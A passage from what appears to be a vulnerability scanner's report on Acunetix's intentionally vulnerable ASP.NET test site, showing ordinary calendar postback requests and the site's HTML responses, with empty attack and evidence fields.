style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8322&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgDAlwl3rdoIZGRkXgxZeP%2BKwWzk89IL7SpX1TCh%2BLs%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKcq4j3DALiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIno9Tnx8fHosIe9TBpbQZYMxBs9Q%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:32:10 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgDAlwl3rdoIZGRkXgxZeP+KwWzk89IL7SpX1TCh+Ls=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKcq4j3DALiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIno9Tnx8fHosIe9TBpbQZYMxBs9Q==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:White" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8123&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCAYxEXEdoIZGRkxf9LtWxhWTZ9C4tqgHbXZIyD71Y%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKd5szcDgKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDIwOsSZckvWPvpaYHyJgjSXuT30f
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:47:45 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCAYxEXEdoIZGRkxf9LtWxhWTZ9C4tqgHbXZIyD71Y=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKd5szcDgKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDIwOsSZckvWPvpaYHyJgjSXuT30f" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:White" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p 